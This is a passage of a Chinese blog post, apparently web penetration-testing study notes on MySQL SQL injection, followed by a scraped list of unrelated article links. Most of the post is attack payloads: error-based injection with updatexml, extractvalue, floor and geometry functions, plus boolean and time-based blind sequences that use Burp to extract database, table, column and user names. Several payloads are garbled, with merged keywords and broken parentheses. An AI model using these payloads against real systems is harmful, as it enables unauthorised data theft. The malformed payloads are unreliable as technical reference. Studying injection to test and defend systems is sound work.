林林木林林L
林林木林林L

WEB渗透学习笔记3——报错注入和盲注

报错注入

报错注入原理

在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息

常用的报错函数

  • updatexml()

    updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数;

    and updatexml(xml_document,Xpathstring,new_value)

    • updatexml(1,concat(0x7e,([select] database()),0x7e),1)
      • xml_document:xml标记,可以是任意值
      • Xpathstring:显示输出的信息,正确的是路径xx/xxx/x
      • new_value:替换找到的符合条件的数据

  • extractvalue()

    extractvalue()函数也是MYSQL对XML文档数据进行查询的XPATH函数;

    正确的应该显示xml路径xx/xxx,但是我们要报错注入,所以就要故意输错以此来显示数据库报错信息

    • and extractvalue(1,concat(0x7e,(select database())))

  • floor()

    • and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

  • name_const()

    • and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

  • join

    • select * from(select * from mysql.user ajoin mysql.user b)c

  • exp()

    • and exp(~(select * from (select user () ) a) )

  • GeometryCollection()

    • and GeometryCollection(()select *from(select user () )a)b )

  • polygon()

    • and polygon (()select * from(select user ())a)b )

  • multipoint

    • and multipoint (()select * from(select user() )a)b )

  • multlinestring()

    • and multlinestring (()select * from(selectuser () )a)b )

  • multpolygon()

    • and multpolygon (()select * from(selectuser () )a)b )

  • linestring()

    • and linestring (()select * from(select user() )a)b )

盲注

有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。 盲注根据展现方式,分为boolean型盲注和时间型盲注

  • 当没有任何报错信息,没有任何输出的时候,只能使用盲注

Boolean盲注原理

Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点

Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否

Boolean盲注的判断方式

  • 通过长度判断:length():length(database())>=x
  • 通过字符判断:substr():substr(database(),1,1) =‘s’
  • 通过ascII码判断:ascii():ascii(substr(database(),1,1)) =x

Boolean盲注攻击

  1. 判断注入类型
  2. 判断数据库名长度:and length(database())>=8
  3. Burp爆库名:and substr(database(),1,1)=‘a’ --+
  4. Burp爆表名:and substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’ --+
  5. Burp爆字段名:and substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1)=‘a’ --+
  6. Burp爆数据:and substr((select username from security.users limit 0,1),1,1)=‘a’ --+

时间盲注原理

代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注

利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3) 语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果 expr1是True,则返回expr2,否则返回expr3

时间盲注判断方式

输入两种类型语句 看哪个有延迟反应就是对应的类型

  • 字符型:'and sleep(5) --+

  • 数值型:and sleep(5)

时间盲注常用函数

• left(m,n) --从左向右截取字符串m返回其前n位

• substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串

• ascii(m) --返回字符m的ASCII码

• if(str1,str2,str3)–如果str1正确就执行str2,否则执行str3

• sleep(m)–使程序暂停m秒

• length(m) --返回字符串m的长度

• count(column_name) --返回指定列的值的数目

时间盲注攻击

  1. 判断注入类型

  2. 判断数据库名长度:and if(length(database())>=6,sleep(5),1)

  3. Burp爆库名:and if(substr(database(),1,1)=‘a’,sleep(5),1)

  4. Burp爆表名:and if(substr((select table_name from information_schema.tables where table_schema=‘test’ limit 0,1),1,1)=‘a’,sleep(5),1)

  5. Burp爆字段名:and if(substr((select column_name from information_schema.columns where table_schema=‘test’ and table_name=‘users’ limit

    0,1),1,1)=‘a’,sleep(5),1)

  6. Burp爆数据:and if(substr(select username from test.users limit 0,1),1,1)=‘a’,sleep(5),1)

你可能感兴趣的:(数据库,web,sql)

  • hive表格统计信息不准确 weixin_41956627 hivehivehadoop数据仓库
    问题描述有个hive分区表,orc存储格式,有个分区,查询selectcount(1)fromtablewheredt='yyyyMMdd'结果是0,但查询select*fromtablewheredt='yyyyMMdd'又能查到数据,去hdfs对应目录下查看,也能看到有数据文件解决执行如下sqlANALYZETABLEdb.table1PARTITION(dt='20240908')COMPU
  • EFCore中利用原生sql进行联表/多表查询 xk_hypothesis EFCore
    EFCore中利用原生sql进行联表/多表查询EFCore的多表查询可以使用join,include这些进行查询,但是写起来比较复杂,它们一般适用于单表查询(个人觉得),对于多表查询,我更喜欢使用原生SQL这种方式。具体方式如下(这里以2张表关联为例):首先,创建两张数据库中对应的实体类:[Table("Sys_User")]publicclassSys_User{//////自增主键///[Ke
  • PostgreSQL 数组类型使用详解 捞起月亮的渔民丁 postgresql数据库
    PostgreSQL数组类型使用详解PostgreSQL数组类型使用详解可能大家对PostgreSQL这个关系型数据库不太熟悉,因为大部分人最熟悉的,公司用的最多的是MySQL我们先对PostgreSQL数据库(下面简称PG)简单的介绍一下,以后有机会,再单独写一篇专门介绍pgSql的文章TheWorld’sMostAdvancedOpenSourceRelationalDatabase这是PG官
  • this is incompatible with sql_mode=only_full_group_by解决方案 Biubbbbbbbbiu NavicatforMySQLsqlmysql数据库
    MySQL查询时报错:thisisincompatiblewithsql_mode=only_full_group_by报错原因分析:一、原理层面这个错误发生在mysql5.7.5版本及以上版本会出现的问题:mysql5.7.5版本以上默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准"。二、sql层面在sql执行时,出现该原因,简单
  • Web安全之SQL注入:如何预防及解决 J老熊 JavaWeb安全web安全sql数据库系统架构面试
    SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
  • 在PostgreSQL中使用JSONB对象数组 weixin_26750481 javapython
    数据库提示(DatabaseTips)Inmylastarticle,wefocusedonturningaPostgreSQLjsonbcolumn,thatcontainedanArrayofObjects,intoarecordset,sothatitcouldbequeriedinarelationalmanner.在我的上一篇文章中,我们专注于将包含对象数组的PostgreSQLjson
  • 连接MySql报错Unable to load authentication plugin 'caching_sha2_password' 培根芝士 JavaSQL
    在使用mybatis-generator-maven-plugin:generate的时候报了一个Unabletoloadauthenticationplugin'caching_sha2_password'的错误。错误的原因是由于MySQL8.0之后的加密规则为caching_sha2_password,而在此之前的加密规则为mysql_native_password。解决方法:mysql-ur
  • SQL联表查询LEFT JOIN 数据去重复 培根芝士 SQLsql数据库
    使用leftjoin联表查询时,如果table1中的一条记录对应了table2的多条记录,则会重复查出id相同的多条记录。SELECTt1.*FROMtable1t1LEFTJOINtable2t2ONt1.id=t2.tid解决方法:将查询结果作为中间表,使用groupby进行去重SELECTtmp.*FROM(SELECTt1.*FROMtable1t1LEFTJOINtable2t2ONt1
  • JDBC客户端连接Starrocks 2.5 MARSERERER 数据库
    4.0.0org.exampleTestStarrocksJdbc1.0-SNAPSHOT88UTF-8mysqlmysql-connector-java5.1.47-->8.0.28maven-assembly-pluginjar-with-dependenciestruecom.example.Testmake-assemblypackagesinglepackagecom.example;i
  • postgresql 判断数据是否存在,存在更新,不存在则插入 llc的足迹 数据库postgresql
    INSERTINTOtable_name(create_time,update_time,name,latest_time)VALUES(NOW(),NOW(),'name''2023-04-2519:05:50')ONCONFLICT(name)DOUPDATESETupdate_time=NOW(),target_name='name',latest_time='2023-04-2519:05
  • flask sqlalchemy 动态创建表 llc的足迹 数据库flasksqlalchemy
    创建模型defget_model(suffix):classBaseModel(Base):__tablename__=f'table_{suffix}'__table_args__={'extend_existing':True}target_name=db.Column(db.String(64),nullable=False,unique=True,comment="名称")target_i
  • sqlalchemy判断表是否存在及动态创建表 llc的足迹 数据库sqlalchemy
    defget_model(suffix):classTableModel(Base):__tablename__=f'table_{suffix}'__table_args__={'extend_existing':True}name=db.Column(db.String(64),comment="名称")desc=db.Column(db.String(32),comment="描述")ret
  • hr标签和注释的总结 Rashore web零基础学习htmlcsshtml5
    hr标签的定义与使用说明定义以及使用说明标签定义HTML页面中的主题变化(比如话题的转移),并显示为一条水平线。元素被用来分隔HTML页面中的内容(或者定义一个变化)。实例hr标签的使用HTMLHTML是用于描述web页面的一种语言。CSSCSS定义如何显示HTML元素。html中注释的使用定义注释标签用来在源文档中插入注释。注释不会在浏览器中显示。使用范围我们可使用注释对您的代码进行解释,这样做
  • 在TCGA上下载数据并且进行处理 Red Red 生信小技巧r语言数据库
    浏览器搜索TCGAGDC进入网站在TCGA数据库主页选择“Repository”模式根据所需要的选项在侧边栏选择数据清空购物车!!第一次登陆可忽略将刚刚选择好的数据加入购物车,并且在购物车里下载Metadata和Cart数据,下载到同一个文件夹下。使用R语言脚本对数据进行处理,将其提取为genesymbol和样本的数据,推荐看一下该博主处理数据!!真的非常详细!他R语言脚本在这个链接里
  • web页面自适应QWebEngineView的大小 吃面不喝汤66 前端
    #ifndefOPENVIPDIALOG_H#defineOPENVIPDIALOG_H#include#include"draggabledialog.h"#includenamespaceUi{classOpenVipDialog;}classOpenVipDialog:publicDraggableDialog{Q_OBJECTpublic:explicitOpenVipDialog(QWi
  • 1、.Net UI框架:Blazor Hybrid - .Net宣传系列文章 lzhdim ui
    BlazorHybrid是.NET6中引入的一个新特性,它允许开发者使用Blazor技术开发跨平台的桌面和移动应用程序。BlazorHybrid结合了BlazorWebAssembly和BlazorServer的优势,提供了一种在桌面和移动设备上运行Blazor应用的方法。BlazorHybrid的关键特性包括:跨平台应用:可以创建在Windows、macOS、Linux、iOS和Android上
  • 人生苦短我用Python pandas文件格式转换 程序喵D 人生苦短我用Pythonpythonpandas
    人生苦短我用Pythonpandas文件格式转换前言示例1excel与csv互转常用格式的方法FlatfileExcelJSONXML示例2常用格式转换简要需求依赖export方法main方法附其它格式的方法HTMLPicklingClipboardLatexHDFStore:PyTables(HDF5)FeatherParquetORCSASSPSSSQLGoogleBigQuerySTATA前
  • 消息中间件之ActiveMQ — 07 筑梦之人 消息中间件MQjavaactivemq
    集群配置官方文档主备集群官方文档MasterSlaveTypeRequirementsProsConsSharedFileSystemMasterSlave共享文件系统,如SAN需要运行多个slave。当master挂掉之后会自动进行故障恢复需要共享文件系统JDBCMasterSlave共享数据库需要运行多个slave。当master挂掉之后会自动进行故障恢复需要一个共享的数据库。也相对缓慢,因为
  • this is incompatible with sql_mode=only_full_group_by解决 返回值 mysqlsqlmysql数据库
    项目场景:有时候,遇到数据库重复数据,需要将数据进行分组,并取出其中一条来展示,这时就需要用到groupby语句。但是,如果mysql是高版本,当执行groupby时,select的字段不属于groupby的字段的话,sql语句就会报错。报错信息如下:Expression#1ofSELECTlistisnotinGROUPBYclauseandcontainsnonaggregatedcolumn
  • HTML5之基础、元信息标签 Programmer.杨 前端技术-HTMLhtmlmetaheadtitle标签
    标签声明位于文档中最前面的位置,处于标签之前。声明不是一个HTML标签,它是告知Web浏览器该页面使用了哪种HTML版本(规范),浏览器用此版本(规范)对该文档进行解析,渲染。可声明的DTD有三种:分别是严格版本(strict)、过渡版本(transitional)、以及基于框架的版本(frameset),若文档不遵循其DTD规范,则此文档中的代码不但不能通过代码校验,并且有可能无法正常显示。文档
  • mysql 查询报错 this is incompatible with sql_mode=only_full_group_by Wind Drift mysqlsql数据库
    InaggregatedquerywithoutGROUPBY,expression#1ofSELECTlistcontainsnonaggregatedcolumn‘smart_site.tc.company_name’;thisisincompatiblewithsql_mode=only_full_group_by原因:这个错误是由于MySQL的"ONLY_FULL_GROUP_BY"SQL
  • MySQL 进阶知识 A_cot mysql数据库前端bigdatadatabase
    当你掌握了基本的SQL语句和数据库操作后,进一步深入了解MySQL的进阶内容,将为你打开更广阔的数据管理和应用之门。一、存储过程与函数1.存储过程存储过程是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中。存储过程可以接收参数、返回结果,并且可以被重复调用。优点:提高性能:存储过程在数据库服务器上执行,减少了网络传输和客户端处理的开销。增强安全性:可以限制对数据库的直接访问,通过存储过程
  • 使用kaptcha验证码框架(代码方式) 念念碎平安夜
    一、编写kaptcha代码@WebServlet("/newCode5")publicclassNewCode5extendsHttpServlet{publicvoiddoGet(HttpServletRequestrequest,HttpServletResponseresponse)throwsServletException,IOException{this.doPost(request,
  • MySQL解决错误this is incompatible with sql_mode=only_full_group_by… 培根芝士 SQLmysqlsql数据库
    在SQL查询语句中加入groupby时报了以下错误:;badSQLgrammar[];nestedexceptionisjava.sql.SQLSyntaxErrorException:Expression#1ofSELECTlistisnotinGROUPBYclauseandcontainsnonaggregatedcolumn'user.varieties.id'whichisnotfunc
  • Postgresql 删除数组中的元素 llc的足迹 数据库postgresql数据库
    extra为{“a”:[null,3,null],“b”:111}使用sql将extra中a中的null移除第一步:首先先把[null,3,null]移除,selectjson_agg(elem)filter(whereelem!='null')from(selectjsonb_array_elements('[null,3,null]'::jsonb)aselem)t;这将得到[3]jsonb_
  • android系统设计模式 轻口味 Android系列android设计模式
    Android官方架构组件介绍之LifeCycle,Android架构组件一共包括以下几个:LifeCycle:与Activity和Fragment的生命周期有关LiveData:异步可订阅数据,也是生命周期感知ViewModel:视图数据持有模型,也是生命周期感知Room:SQLite抽象层,用于简化SQLite数据存储官网设计原则Android应用程序的开发使用Java编写,在架构上使用MVC
  • 前段存储sessionStorage值localStorage值 ___大鱼___
    对浏览器来说,使用WebStorage存储键值对比存储Cookie方式更直观,而且容量更大,它包含两种:localStorage和sessionStoragesessionStorage(临时存储):为每一个数据源维持一个存储区域,在浏览器打开期间存在,包括页面重新加载localStorage(长期存储):与sessionStorage一样,但是浏览器关闭后,数据依然会一直存在constinfo=
  • MVC和三层架构和Dao,service,controller的区别 xwh- mvc架构
    一。MVCMVC(Model-View-Controller)是一种常见的软件架构模式,用于组织和管理应用程序的代码。它将应用程序分为三个主要的组成部分:模型(Model)、视图(View)和控制器(Controller)。模型(Model):模型代表应用程序的数据和业务逻辑。它负责处理数据的读取、存储、验证和计算等操作,以及定义业务规则。模型是应用程序的核心,通常包含与数据库交互的代码。视图(V
  • 前端工程化——脚手架及自动化构建 Jelly-JK 前端工程化javascriptnode.jshtml
    定义一切以提高效率、降低成本、质量保证为目的的手段,都属于工程化前端工程化主要解决的问题传统语言或语法的弊端无法使用模块化/组件化重复性的机械工作代码风格统一、质量保证依赖后端服务接口的保证整体依赖后端项目工程化的表现体现在项目的整个流程:创建项目创建项目结构创建特定类型文件编码格式化校验校验代码风格编译/构建/打包预览/测试WebServer/MockLiveReloading/HMRSourc
  • 初见flyway simple哇 数据库数据库
    flyway(一种数据库版本控制工具document)两种文件V和RV:V开头是不可重复执行的文件,每次修改完都该更改名称R:R开头是可重复执行的文件,需要保证内部sql都是可以重复执行的名称格式:V__table_name.sql,R__table_name.sql操作baseline:以现在数据库状态为基准,创建flyway_schema_history表,以及相关信息填充[类似初始化]mig
  • xml解析 小猪猪08 xml
    1、DOM解析的步奏 准备工作:    1.创建DocumentBuilderFactory的对象    2.创建DocumentBuilder对象    3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件    4.通过Document的getElem
  • 每个开发人员都需要了解的一个SQL技巧 brotherlamp linuxlinux视频linux教程linux自学linux资料
      对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷,比如说它们是应用到表上面的,但有的时候你可能希望指定一条约束,而它只在特定条件下才生效。 使用SQL标准的WITH CHECK OPTION子句就能完成这点,至少Oracle和SQL Server都实现了这个功能。下面是实现方式: CREATE TABLE books (   id &
  • Quartz——CronTrigger触发器 eksliang quartzCronTrigger
    转载请出自出处:http://eksliang.iteye.com/blog/2208295 一.概述 CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案,调度规则基于 Cron 表达式,CronTrigger 支持日历相关的重复时间间隔(比如每月第一个周一执行),而不是简单的周期时间间隔。 二.Cron表达式介绍 1)Cron表达式规则表 Quartz
  • Informatica基础 18289753290 InformaticaMonitormanagerworkflowDesigner
    1. 1)PowerCenter Designer:设计开发环境,定义源及目标数据结构;设计转换规则,生成ETL映射。 2)Workflow  Manager:合理地实现复杂的ETL工作流,基于时间,事件的作业调度 3)Workflow  Monitor:监控Workflow和Session运行情况,生成日志和报告 4)Repository  Manager:
  • linux下为程序创建启动和关闭的的sh文件,scrapyd为例 酷的飞上天空 scrapy
    对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径,想到可以做一个简单的启动和关闭控制的文件   下面以scrapy启动server为例,文件名为run.sh:   #端口号,根据此端口号确定PID PORT=6800 #启动命令所在目录 HOME='/home/jmscra/scrapy/' #查询出监听了PORT端口
  • 人--自私与无私 永夜-极光
                今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么?               从客观的角度来看,人有自私的行为,也有无私的
  • Ubuntu安装NS-3 环境脚本 随便小屋 ubuntu
      将附件下载下来之后解压,将解压后的文件ns3environment.sh复制到下载目录下(其实放在哪里都可以,就是为了和我下面的命令相统一)。输入命令:   sudo ./ns3environment.sh >>result   这样系统就自动安装ns3的环境,运行的结果在result文件中,如果提示     com
  • 创业的简单感受 aijuans 创业的简单感受
           2009年11月9日我进入a公司实习,2012年4月26日,我离开a公司,开始自己的创业之旅。      今天是2012年5月30日,我忽然很想谈谈自己创业一个月的感受。 当初离开边锋时,我就对自己说:“自己选择的路,就是跪着也要把他走完”,我也做好了心理准备,准备迎接一次次的困难。我这次走出来,不管成败
  • 如何经营自己的独立人脉 aoyouzi 如何经营自己的独立人脉
    独立人脉不是父母、亲戚的人脉,而是自己主动投入构造的人脉圈。“放长线,钓大鱼”,先行投入才能产生后续产出。   现在几乎做所有的事情都需要人脉。以银行柜员为例,需要拉储户,而其本质就是社会人脉,就是社交!很多人都说,人脉我不行,因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行,怎么能建立人脉?我这里说的人脉,是你的独立人脉。   以一个普通的银行柜员
  • JSP基础 百合不是茶 jsp注释隐式对象
      1,JSP语句的声明 <%! 声明 %>    声明:这个就是提供java代码声明变量、方法等的场所。 表达式 <%= 表达式 %>    这个相当于赋值,可以在页面上显示表达式的结果, 程序代码段/小型指令 <% 程序代码片段 %>   2,JSP的注释   <!-- -->
  • web.xml之session-config、mime-mapping bijian1013 javaweb.xmlservletsession-configmime-mapping
    session-config 1.定义: <session-config> <session-timeout>20</session-timeout> </session-config> 2.作用:用于定义整个WEB站点session的有效期限,单位是分钟。   mime-mapping 1.定义: <mime-m
  • 互联网开放平台(1) Bill_chen 互联网qq新浪微博百度腾讯
    现在各互联网公司都推出了自己的开放平台供用户创造自己的应用,互联网的开放技术欣欣向荣,自己总结如下: 1.淘宝开放平台(TOP) 网址:http://open.taobao.com/ 依赖淘宝强大的电子商务数据,将淘宝内部业务数据作为API开放出去,同时将外部ISV的应用引入进来。 目前TOP的三条主线: TOP访问网站:open.taobao.com ISV后台:my.open.ta
  • 【MongoDB学习笔记九】MongoDB索引 bit1129 mongodb
    索引 可以在任意列上建立索引 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 使用索引可以加快查询,但同时会降低修改,插入等的性能 内嵌文档照样可以建立使用索引 测试数据     var p1 = { "name":"Jack", "age&q
  • JDBC常用API之外的总结 白糖_ jdbc
    做JAVA的人玩JDBC肯定已经很熟练了,像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦,我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了,在这我介绍一些写框架时常用的API,大家共同学习吧。     ResultSetMetaData获取ResultSet对象的元数据信息
  • apache VelocityEngine使用记录 bozch VelocityEngine
    VelocityEngine是一个模板引擎,能够基于模板生成指定的文件代码。   使用方法如下:     VelocityEngine engine = new VelocityEngine();// 定义模板引擎     Properties properties = new Properties();// 模板引擎属
  • 编程之美-快速找出故障机器 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; public class TheLostID { /*编程之美 假设一个机器仅存储一个标号为ID的记录,假设机器总量在10亿以下且ID是小于10亿的整数,假设每份数据保存两个备份,这样就有两个机器存储了同样的数据。 1.假设在某个时间得到一个数据文件ID的列表,是
  • 关于Java中redirect与forward的区别 chenbowen00 javaservlet
    在Servlet中两种实现: forward方式:request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); redirect方式:response.sendRedirect(“/somePage.jsp”); forward是服务器内部重定向,程序收到请求后重新定向到另一个程序,客户机并不知
  • [信号与系统]人体最关键的两个信号节点 comsci 系统
            如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门         如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的
  • oracle 存储过程执行权限 daizj oracle存储过程权限执行者调用者
    在数据库系统中存储过程是必不可少的利器,存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了,说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能,其中涉及到判断一张表是否已经建立,没有建立就由存储过程来建立这张表。 CREATE OR REPLACE PROCEDURE TestProc  IS    fla
  • 为mysql数据库建立索引 dengkane mysql性能索引
    前些时候,一位颇高级的程序员居然问我什么叫做索引,令我感到十分的惊奇,我想这绝不会是沧海一粟,因为有成千上万的开发者(可能大部分是使用MySQL的)都没有受过有关数据库的正规培训,尽管他们都为客户做过一些开发,但却对如何为数据库建立适当的索引所知较少,因此我起了写一篇相关文章的念头。  最普通的情况,是为出现在where子句的字段建一个索引。为方便讲述,我们先建立一个如下的表。
  • 学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例 dcj3sjt126com c算法
    如果看懂一个程序,分三步   1、流程   2、每个语句的功能   3、试数   如何学习一些小算法的程序 尝试自己去编程解决它,大部分人都自己无法解决 如果解决不了就看答案 关键是把答案看懂,这个是要花很大的精力,也是我们学习的重点 看懂之后尝试自己去修改程序,并且知道修改之后程序的不同输出结果的含义 照着答案去敲 调试错误
  • centos6.3安装php5.4报错 dcj3sjt126com centos6
    报错内容如下: Resolving Dependencies --> Running transaction check ---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed --> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for
  • JSONP请求 flyer0126 jsonp
          使用jsonp不能发起POST请求。 It is not possible to make a JSONP POST request. JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos
  • Spring Security(03)——核心类简介 234390216 Authentication
    核心类简介 目录 1.1     Authentication 1.2     SecurityContextHolder 1.3     AuthenticationManager和AuthenticationProvider 1.3.1  &nb
  • 在CentOS上部署JAVA服务 java--hhf javajdkcentosJava服务
        本文将介绍如何在CentOS上运行Java Web服务,其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行     第一步:卸载旧Linux自带的JDK ①查看本机JDK版本 java -version    结果如下 java version "1.6.0"
  • oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date] ldzyz007 oraclemysqlSQL Server
    oracle                                &n
  • 记Protocol Oriented Programming in Swift of WWDC 2015 ningandjin protocolWWDC 2015Swift2.0
    其实最先朋友让我就这个题目写篇文章的时候,我是拒绝的,因为觉得苹果就是在炒冷饭, 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲,看完整个Session之后呢,虽然还是觉得在炒冷饭,但是毕竟还是加了蛋的,有些东西还是值得说说的。 通常谈到面向接口编程,其主要作用是把系统设计和具体实现分离开,让系统的每个部分都可以在不影响别的部分的情况下,改变自身的具体实现。接口的设计就反映了系统
  • 搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS rensanning keepalived
    (一)Keepalived (1)安装 # cd /usr/local/src # wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz # tar zxvf keepalived-1.2.15.tar.gz # cd keepalived-1.2.15 # ./configure # make &a
  • ORACLE数据库SCN和时间的互相转换 tomcat_oracle oraclesql
    SCN(System Change Number 简称 SCN)是当Oracle数据库更新后,由DBMS自动维护去累积递增的一个数字,可以理解成ORACLE数据库的时间戳,从ORACLE 10G开始,提供了函数可以实现SCN和时间进行相互转换;    用途:在进行数据库的还原和利用数据库的闪回功能时,进行SCN和时间的转换就变的非常必要了;    操作方法:   1、通过dbms_f
  • Spring MVC 方法注解拦截器 xp9802 spring mvc
    应用场景,在方法级别对本次调用进行鉴权,如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器,获得本次请求的用户,存放到request或者session域。 python中,之前在python flask中可以使用装饰器来对方法进行预处理,进行权限处理 先看一个实例,使用@access_required拦截: ?
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他